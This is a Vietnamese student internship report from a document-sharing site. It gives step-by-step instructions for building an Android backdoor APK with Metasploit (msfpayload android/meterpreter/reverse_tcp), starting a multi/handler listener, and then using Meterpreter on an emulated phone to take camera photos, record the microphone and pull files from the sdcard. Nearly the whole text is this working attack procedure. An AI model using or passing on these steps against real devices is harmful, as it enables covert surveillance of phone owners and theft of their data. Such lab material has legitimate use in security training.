vũ thanh hiếu tạo mã độc trên kali linux để xâm nhập android
TRANSCRIPT
![Page 1: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/1.jpg)
Sinh viên thực tập : Vũ Thanh Hiếu
Ca thực tập : 7h=>10h thứ 2,4,6
Tạo mã độc trên Kali Linux để xâm nhập Android
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android
tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng
Vmware, ta nên thiết lập phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
Bấm vào Network Adapter và chọn Bridged: connection directly to the physical
network
![Page 2: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/2.jpg)
Bấm vào Edit -> Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của
máy thật
![Page 3: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/3.jpg)
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android
Đầu tiên mở terminal
192.168.199.139 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP
của máy Kali
gõ dòng lệnh
msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R >
/root/Desktop/madoc.apk
![Page 4: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/4.jpg)
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng
Lệnh trên sẽ tạo ra 1 file madoc.apk trên desktop của Kali, đây chính là một Metasploit
reverse tcp backdoor.
![Page 5: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/5.jpg)
Tiếp theo, gõ lệnh msfconsole
Sau khi msfconsole load xong :
![Page 6: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/6.jpg)
ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080– nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
![Page 7: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/7.jpg)
Thử với một máy sony xperia z giả lập, tải về madoc.apk, cài đặt và mở lên được giao
diện như dưới, nhấp vào nút reverse_tcp:
![Page 8: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/8.jpg)
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:
![Page 9: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/9.jpg)
Để xem thông tin về máy, nhập lệnh SysInfo
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở
danh sách camera ở phần trước. Ví dụ như sau:
![Page 10: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/10.jpg)
File hình đã chụp từ camera của máy android là XCCRDJmb.jpeg được lưu ở
/root của máy
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
![Page 11: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/11.jpg)
Lấy file từ sd card
Để vào sdcard, nhập lệnh :cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
![Page 12: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/12.jpg)
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
![Page 13: Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android](https://reader035.vdocuments.site/reader035/viewer/2022062319/557cd800d8b42a4b6b8b4a46/html5/thumbnails/13.jpg)